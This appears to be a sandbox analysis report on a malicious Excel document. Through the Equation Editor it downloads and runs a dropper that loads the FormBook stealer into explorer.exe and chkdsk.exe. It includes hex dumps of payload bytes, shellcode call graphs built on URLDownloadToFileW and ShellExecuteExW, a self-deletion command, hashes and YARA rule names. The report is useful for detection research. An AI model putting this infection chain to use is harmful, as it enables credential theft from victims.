                                        May 13, 2022 17:07:42.000335932 CEST14INData Raw: 79 00 2b 35 60 ce 40 00 57 03 74 24 14 ff 15 f8 80 40 00 33 db 05 f4 01 00 00 3b f3 a3 ac 8a 7a 00 0f 8e 2a 01 00 00 ff 35 44 f7 79 00 e8 46 01 00 00 53 53 ff 35 60 ce 40 00 ff 35 1c a0 40 00 ff 15 60 81 40 00 89 35 40 f7 79 00 89 1d 30 f7 79 00
                                        Data Ascii: y+5`@Wt$@3;z*5DyFSS5`@5@`@5@y0y0x8y@+Dy;07yWV=Dy5h@=l@9zt)9@zu!@yS+4y+D$`@0yYhh@-p@t@26|j5p@+t!VU5@
                                        May 13, 2022 17:07:42.000353098 CEST16INData Raw: 72 50 0f b7 05 3e a3 40 00 99 0f a4 c2 10 c1 e0 10 8b d8 0f b7 05 3c a3 40 00 0f b7 0d 38 a3 40 00 99 0b d8 0f b7 05 3a a3 40 00 c1 e0 10 0b c1 33 c9 99 0b c8 8b c3 0b c2 8b 17 3b d1 75 07 8b 57 04 3b d0 74 0a 4f 4f 81 ff 00 30 7b 00 73 e9 33 db
                                        Data Ascii: rP>@<@8@:@3;uW;tOO0{s30{E@rAfW&=Wh8{.,Wh@{#,]LzE!h,@V,th(@V,h@V+H{WV(@Vt h!
                                        May 13, 2022 17:07:42.000370979 CEST17INData Raw: 50 ff 74 24 2c ff 74 24 2c 68 00 00 00 80 57 56 68 80 00 00 00 ff 15 24 82 40 00 a3 68 1f 7a 00 57 e8 eb d4 ff ff 85 c0 74 08 6a 02 58 e9 bf 00 00 00 e8 c2 00 00 00 39 3d 40 8b 7a 00 0f 85 83 00 00 00 6a 05 ff 35 68 1f 7a 00 ff 15 50 82 40 00 68
                                        Data Ascii: Pt$,t$,hWVh$@hzWtjX9=@zj5hzP@h<@v*uh0@h*5(@@SUWuSh@WS-dzz@zzWih@@WP5z,@jVj+Wt9=lzzNj.Bj"3_^


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:17:07:16
                                        Start date:13/05/2022
                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                        Imagebase:0x13fb90000
                                        File size:28253536 bytes
                                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:2
                                        Start time:17:07:42
                                        Start date:13/05/2022
                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                        Imagebase:0x400000
                                        File size:543304 bytes
                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:4
                                        Start time:17:07:47
                                        Start date:13/05/2022
                                        Path:C:\Users\Public\vbc.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\Public\vbc.exe"
                                        Imagebase:0x400000
                                        File size:263783 bytes
                                        MD5 hash:5AF1C7DD89A535DEE51C3E28B4A74F8D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        Reputation:low

                                        General

                                        Target ID:5
                                        Start time:17:07:48
                                        Start date:13/05/2022
                                        Path:C:\Users\user\AppData\Local\Temp\bmexo.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya
                                        Imagebase:0xf20000
                                        File size:80384 bytes
                                        MD5 hash:FD42CBBC6D53AD34694C46731AABD852
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Target ID:6
                                        Start time:17:07:50
                                        Start date:13/05/2022
                                        Path:C:\Users\user\AppData\Local\Temp\bmexo.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya
                                        Imagebase:0xf20000
                                        File size:80384 bytes
                                        MD5 hash:FD42CBBC6D53AD34694C46731AABD852
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Target ID:7
                                        Start time:17:07:55
                                        Start date:13/05/2022
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0xff040000
                                        File size:3229696 bytes
                                        MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        General

                                        Target ID:8
                                        Start time:17:08:24
                                        Start date:13/05/2022
                                        Path:C:\Windows\SysWOW64\chkdsk.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                        Imagebase:0x80000
                                        File size:16384 bytes
                                        MD5 hash:A01E18A156825557A24A643A2547AA8C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        General

                                        Target ID:9
                                        Start time:17:08:28
                                        Start date:13/05/2022
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del "C:\Users\user\AppData\Local\Temp\bmexo.exe"
                                        Imagebase:0x49d30000
                                        File size:302592 bytes
                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:22%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:64%
                                          Total number of Nodes:161
                                          Total number of Limit Nodes:9
                                          execution_graph 537 35d0475 538 35d0477 537->538 539 35d047c 538->539 555 35d048a LoadLibraryW 538->555 571 35d04a4 539->571 546 35d04b5 URLDownloadToFileW 585 35d0555 546->585 550 35d056b ShellExecuteExW 600 35d058a 550->600 551 35d05c2 553 35d057e 553->551 554 35d058d ExitProcess 553->554 556 35d048c 555->556 557 35d04a4 11 API calls 556->557 558 35d0491 557->558 560 35d050b 8 API calls 558->560 562 35d04b5 URLDownloadToFileW 558->562 560->562 561 35d0555 5 API calls 563 35d0545 561->563 562->561 564 35d056c 3 API calls 563->564 565 35d055c 564->565 566 35d056b ShellExecuteExW 565->566 568 35d05c2 565->568 567 35d058a ExitProcess 566->567 569 35d057e 567->569 568->539 569->568 570 35d058d ExitProcess 569->570 572 35d04a7 571->572 573 35d04b5 URLDownloadToFileW 572->573 574 35d050b 8 API calls 572->574 576 35d0555 5 API calls 573->576 574->573 577 35d0545 576->577 578 35d056c 3 API calls 577->578 579 35d055c 578->579 580 35d056b ShellExecuteExW 579->580 582 35d0491 579->582 581 35d058a ExitProcess 580->581 583 35d057e 581->583 582->546 602 35d050b URLDownloadToFileW 582->602 583->582 584 35d058d ExitProcess 583->584 586 35d0557 585->586 587 35d055c 586->587 588 35d056c 3 API calls 586->588 589 35d056b ShellExecuteExW 587->589 591 35d0545 587->591 588->587 590 35d058a ExitProcess 589->590 592 35d057e 590->592 594 35d056c 591->594 592->591 593 35d058d ExitProcess 592->593 595 35d056f ShellExecuteExW 594->595 596 35d058a ExitProcess 595->596 597 35d057e 595->597 596->597 598 35d055c 597->598 599 35d058d ExitProcess 597->599 598->550 598->551 601 35d058d ExitProcess 600->601 603 35d0555 5 API calls 602->603 604 35d0545 602->604 603->604 605 35d056c 3 API calls 604->605 606 35d055c 605->606 607 35d056b ShellExecuteExW 606->607 609 35d05c2 606->609 608 35d058a ExitProcess 607->608 610 35d057e 608->610 609->546 610->609 611 35d058d ExitProcess 610->611 614 35d03e5 ExitProcess 631 35d03fe 614->631 617 35d04a4 11 API calls 618 35d0491 617->618 620 35d050b 8 API calls 618->620 622 35d04b5 URLDownloadToFileW 618->622 620->622 621 35d0555 5 API calls 623 35d0545 621->623 622->621 624 35d056c 3 API calls 623->624 625 35d055c 624->625 626 35d056b ShellExecuteExW 625->626 629 35d05c2 625->629 627 35d058a ExitProcess 626->627 628 35d057e 627->628 628->629 630 35d058d ExitProcess 628->630 632 35d0404 631->632 649 35d041a 632->649 635 35d04a4 11 API calls 636 35d0491 635->636 638 35d050b 8 API calls 636->638 640 35d04b5 URLDownloadToFileW 636->640 638->640 639 35d0555 5 API calls 641 35d0545 639->641 640->639 642 35d056c 3 API calls 641->642 643 35d055c 642->643 644 35d056b ShellExecuteExW 643->644 646 35d03f1 643->646 645 35d058a ExitProcess 644->645 647 35d057e 645->647 646->617 647->646 648 35d058d ExitProcess 647->648 650 35d0420 649->650 669 35d0441 650->669 652 35d0491 653 35d050b 8 API calls 652->653 658 35d04b5 URLDownloadToFileW 652->658 653->658 654 35d04a4 11 API calls 654->652 657 35d0555 5 API calls 660 35d0545 657->660 658->657 662 35d056c 3 API calls 660->662 661 35d0453 661->654 663 35d055c 662->663 664 35d056b ShellExecuteExW 663->664 666 35d040b 663->666 665 35d058a ExitProcess 664->665 667 35d057e 665->667 666->635 667->666 668 35d058d ExitProcess 667->668 670 35d0444 669->670 671 35d0475 18 API calls 670->671 672 35d0453 671->672 673 35d04a4 11 API calls 672->673 674 35d0491 673->674 675 35d04b5 URLDownloadToFileW 674->675 677 35d050b 8 API calls 674->677 678 35d0555 5 API calls 675->678 677->675 679 35d0545 678->679 680 35d056c 3 API calls 679->680 681 35d055c 680->681 682 35d056b ShellExecuteExW 681->682 684 35d0427 681->684 683 35d058a ExitProcess 682->683 685 35d057e 683->685 684->652 684->661 687 35d0475 684->687 685->684 686 35d058d ExitProcess 685->686 688 35d0477 687->688 689 35d047c 688->689 690 35d048a 15 API calls 688->690 691 35d04a4 11 API calls 689->691 690->689 692 35d0491 691->692 694 35d050b 8 API calls 692->694 696 35d04b5 URLDownloadToFileW 692->696 694->696 695 35d0555 5 API calls 697 35d0545 695->697 696->695 698 35d056c 3 API calls 697->698 699 35d055c 698->699 700 35d056b ShellExecuteExW 699->700 701 35d05c2 699->701 702 35d058a ExitProcess 700->702 701->661 703 35d057e 702->703 703->701 704 35d058d ExitProcess 703->704 612 35d0591 GetPEB 613 35d059f 612->613 705 35d0423 706 35d0491 705->706 708 35d042a 705->708 707 35d050b 8 API calls 706->707 712 35d04b5 URLDownloadToFileW 706->712 707->712 708->706 713 35d0475 18 API calls 708->713 715 35d0453 708->715 709 35d04a4 11 API calls 709->706 711 35d0555 5 API calls 714 35d0545 711->714 712->711 713->715 716 35d056c 3 API calls 714->716 715->709 717 35d055c 716->717 718 35d056b ShellExecuteExW 717->718 720 35d05c2 717->720 719 35d058a ExitProcess 718->719 721 35d057e 719->721 721->720 722 35d058d ExitProcess 721->722

                                          Callgraph

                                          • Executed
                                          • Not Executed
                                          • Opacity -> Relevance
                                          • Disassembly available
                                          callgraph 0 Function_035D03FE 3 Function_035D041A 0->3 6 Function_035D0555 0->6 12 Function_035D056C 0->12 13 Function_035D050B 0->13 14 Function_035D058A 0->14 16 Function_035D060A 0->16 19 Function_035D04A4 0->19 1 Function_035D05B9 2 Function_035D0098 3->6 7 Function_035D0475 3->7 3->12 3->13 3->14 3->16 3->19 22 Function_035D0441 3->22 4 Function_035D019A 5 Function_035D023A 6->12 6->14 7->6 7->12 7->13 7->14 15 Function_035D048A 7->15 7->19 8 Function_035D01B4 9 Function_035D00B7 10 Function_035D0591 10->1 11 Function_035D0312 12->14 13->6 13->12 13->14 15->6 15->12 15->13 15->14 15->19 17 Function_035D03E5 17->0 17->6 17->12 17->13 17->14 17->19 18 Function_035D01A4 19->6 19->12 19->13 19->14 20 Function_035D02E7 21 Function_035D0126 22->6 22->7 22->12 22->13 22->14 22->19 23 Function_035D0423 23->6 23->7 23->12 23->13 23->14 23->19

                                          Executed Functions

                                          Function 035D048A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 96libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 35d048a-35d0496 LoadLibraryW call 35d04a4 4 35d0498-35d0505 call 35d050b 0->4 5 35d0506 0->5 7 35d0507-35d0562 URLDownloadToFileW call 35d0555 call 35d056c 4->7 5->7 17 35d05c9-35d05cd 7->17 18 35d0564-35d0569 7->18 19 35d05cf 17->19 20 35d05f8-35d0601 17->20 21 35d056b-35d0581 ShellExecuteExW call 35d058a 18->21 22 35d05c2 18->22 24 35d05d3 19->24 23 35d05c5-35d05c8 20->23 21->24 36 35d0583 21->36 22->23 26 35d05ca-35d05cd 23->26 27 35d0603 23->27 28 35d05db-35d05df 24->28 29 35d05d5-35d05d9 24->29 26->19 26->20 31 35d0606-35d0607 27->31 33 35d05f4-35d05f6 28->33 34 35d05e1-35d05e5 28->34 29->28 32 35d05e7-35d05ee 29->32 37 35d05f0 32->37 38 35d05f2 32->38 33->31 34->32 34->33 36->33 39 35d0585-35d058f ExitProcess 36->39 37->33 38->20
                                          APIs
                                          • LoadLibraryW.KERNEL32(035D047C), ref: 035D048A
                                            • Part of subcall function 035D04A4: URLDownloadToFileW.URLMON(00000000,035D04B5,?,00000000,00000000), ref: 035D050D
                                            • Part of subcall function 035D04A4: ShellExecuteExW.SHELL32(0000003C), ref: 035D0577
                                            • Part of subcall function 035D04A4: ExitProcess.KERNEL32(00000000), ref: 035D058F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.965939065.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_35d0000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
                                          • String ID: <
                                          • API String ID: 2508257586-4251816714
                                          • Opcode ID: 9ccb5035057099be711a01443de9ff6ed063a4c97c623e1e17d4317a6f5189e4
                                          • Instruction ID: 596d87f5fbdc6f2768144f5032e7cec7b0fcbcaafba7830b0875e752bfb8fd75
                                          • Opcode Fuzzy Hash: 9ccb5035057099be711a01443de9ff6ed063a4c97c623e1e17d4317a6f5189e4
                                          • Instruction Fuzzy Hash: 1831BCE280D3C11FD733D7389C6969ABFA47F93210F1889CED8C64A4E3E6689501C712
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035D041A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142filenetworkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 42 35d041a-35d0428 call 35d060a call 35d0441 47 35d049a-35d0505 call 35d050b 42->47 48 35d042a-35d042f 42->48 59 35d0507-35d0562 URLDownloadToFileW call 35d0555 call 35d056c 47->59 48->47 50 35d0431-35d0437 48->50 54 35d048c-35d0496 call 35d04a4 50->54 55 35d0439-35d0488 call 35d0475 50->55 63 35d0498-35d0499 54->63 64 35d0506 54->64 55->54 74 35d05c9-35d05cd 59->74 75 35d0564-35d0569 59->75 63->47 64->59 76 35d05cf 74->76 77 35d05f8-35d0601 74->77 79 35d056b-35d0581 ShellExecuteExW call 35d058a 75->79 80 35d05c2 75->80 82 35d05d3 76->82 81 35d05c5-35d05c8 77->81 79->82 94 35d0583 79->94 80->81 84 35d05ca-35d05cd 81->84 85 35d0603 81->85 86 35d05db-35d05df 82->86 87 35d05d5-35d05d9 82->87 84->76 84->77 89 35d0606-35d0607 85->89 91 35d05f4-35d05f6 86->91 92 35d05e1-35d05e5 86->92 87->86 90 35d05e7-35d05ee 87->90 95 35d05f0 90->95 96 35d05f2 90->96 91->89 92->90 92->91 94->91 97 35d0585-35d058f ExitProcess 94->97 95->91 96->77
                                          APIs
                                          • URLDownloadToFileW.URLMON(00000000,035D04B5,?,00000000,00000000), ref: 035D050D
                                          • ShellExecuteExW.SHELL32(0000003C), ref: 035D0577
                                          • ExitProcess.KERNEL32(00000000), ref: 035D058F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.965939065.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_35d0000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: DownloadExecuteExitFileProcessShell
                                          • String ID: <
                                          • API String ID: 3584569557-4251816714
                                          • Opcode ID: d5f385a17b452ee4a22e457fc4c247a05a9c49c1dd349752f7b6fb0355ce510c
                                          • Instruction ID: 7361159d2c5b6898473b9589df56e2905a0da340fe745af009da460c53bc2191
                                          • Opcode Fuzzy Hash: d5f385a17b452ee4a22e457fc4c247a05a9c49c1dd349752f7b6fb0355ce510c
                                          • Instruction Fuzzy Hash: 8741CFA580D3C15FD722D738AD69696BF60BF53200F4C8ACED8C64B1F3D6689105C752
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035D03FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 125filenetworkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 100 35d03fe-35d040c call 35d060a call 35d041a 105 35d045f-35d047b 100->105 106 35d040f 100->106 110 35d047c-35d047e 105->110 107 35d0411-35d0414 106->107 108 35d0480-35d0488 106->108 107->110 111 35d0417 107->111 112 35d048c-35d0496 call 35d04a4 108->112 110->108 111->112 113 35d0419-35d041c 111->113 116 35d0498-35d0505 call 35d050b 112->116 117 35d0506 112->117 113->105 119 35d0507-35d0562 URLDownloadToFileW call 35d0555 call 35d056c 116->119 117->119 129 35d05c9-35d05cd 119->129 130 35d0564-35d0569 119->130 131 35d05cf 129->131 132 35d05f8-35d0601 129->132 133 35d056b-35d0581 ShellExecuteExW call 35d058a 130->133 134 35d05c2 130->134 136 35d05d3 131->136 135 35d05c5-35d05c8 132->135 133->136 148 35d0583 133->148 134->135 138 35d05ca-35d05cd 135->138 139 35d0603 135->139 140 35d05db-35d05df 136->140 141 35d05d5-35d05d9 136->141 138->131 138->132 143 35d0606-35d0607 139->143 145 35d05f4-35d05f6 140->145 146 35d05e1-35d05e5 140->146 141->140 144 35d05e7-35d05ee 141->144 149 35d05f0 144->149 150 35d05f2 144->150 145->143 146->144 146->145 148->145 151 35d0585-35d058f ExitProcess 148->151 149->145 150->132
                                          APIs
                                          • URLDownloadToFileW.URLMON(00000000,035D04B5,?,00000000,00000000), ref: 035D050D
                                          • ShellExecuteExW.SHELL32(0000003C), ref: 035D0577
                                          • ExitProcess.KERNEL32(00000000), ref: 035D058F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.965939065.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_35d0000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: DownloadExecuteExitFileProcessShell
                                          • String ID: <
                                          • API String ID: 3584569557-4251816714
                                          • Opcode ID: 49a94e86a8770fc17195f680066e23f45b051e69b97363311493ed90d71f7e2a
                                          • Instruction ID: f4349a8f0b26001faa6cf30969546a596e9f44e83660bdb3c2cbffea30169452
                                          • Opcode Fuzzy Hash: 49a94e86a8770fc17195f680066e23f45b051e69b97363311493ed90d71f7e2a
                                          • Instruction Fuzzy Hash: 9B419DA580D3C15FC723D738AC69696BFA47F93200F188ACFD8C64B4E3E6689505C752
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035D04A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 154 35d04a4-35d04af 156 35d04b5-35d0562 URLDownloadToFileW call 35d0555 call 35d056c 154->156 157 35d04b0 call 35d050b 154->157 166 35d05c9-35d05cd 156->166 167 35d0564-35d0569 156->167 157->156 168 35d05cf 166->168 169 35d05f8-35d0601 166->169 170 35d056b-35d0581 ShellExecuteExW call 35d058a 167->170 171 35d05c2 167->171 173 35d05d3 168->173 172 35d05c5-35d05c8 169->172 170->173 185 35d0583 170->185 171->172 175 35d05ca-35d05cd 172->175 176 35d0603 172->176 177 35d05db-35d05df 173->177 178 35d05d5-35d05d9 173->178 175->168 175->169 180 35d0606-35d0607 176->180 182 35d05f4-35d05f6 177->182 183 35d05e1-35d05e5 177->183 178->177 181 35d05e7-35d05ee 178->181 186 35d05f0 181->186 187 35d05f2 181->187 182->180 183->181 183->182 185->182 188 35d0585-35d058f ExitProcess 185->188 186->182 187->169
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.965939065.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 035D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_35d0000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: DownloadExecuteExitFileProcessShell
                                          • String ID: <
                                          • API String ID: 3584569557-4251816714
                                          • Opcode ID: 0376f9c17cf50bd03b7457996a0481c395617d7867d88a76ee2b94b831304bfa
                                          • Instruction ID: 7fcab591c204690a443da628c83f31bff68b0ba31dbb05401d39aaf09042ad08
                                          • Opcode Fuzzy Hash: 0376f9c17cf50bd03b7457996a0481c395617d7867d88a76ee2b94b831304bfa
                                          • Instruction Fuzzy Hash: 743169E680D3C15FD733D7389C68696BFA47F96210F5889CE98C64A4E3EA689401C712
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035D050B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43filenetworkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 191 35d050b-35d053e URLDownloadToFileW 192 35d0545-35d0562 call 35d056c 191->192 193 35d0540 call 35d0555 191->193 197 35d05c9-35d05cd 192->197 198 35d0564-35d0569 192->198 193->192 199 35d05cf 197->199 200 35d05f8-35d0601 197->200 201 35d056b-35d0581 ShellExecuteExW call 35d058a 198->201 202 35d05c2 198->202 204 35d05d3 199->204 203 35d05c5-35d05c8 200->203 201->204 216 35d0583 201->216 202->203 206 35d05ca-35d05cd 203->206 207 35d0603 203->207 208 35d05db-35d05df 204->208 209 35d05d5-35d05d9 204->209 206->199 206->200 211 35d0606-35d0607 207->211 213 35d05f4-35d05f6 208->213 214 35d05e1-35d05e5 208->214 209->208 212 35d05e7-35d05ee 209->212 217 35d05f0 212->217 218 35d05f2 212->218 213->211 214->212 214->213 216->213 219 35d0585-35d058f ExitProcess 216->219 217->213 218->200
                                          APIs
                                          • URLDownloadToFileW.URLMON(00000000,035D04B5,?,00000000,00000000), ref: 035D050D
                                            • Part of subcall function 035D0555: ShellExecuteExW.SHELL32(0000003C), ref: 035D0577
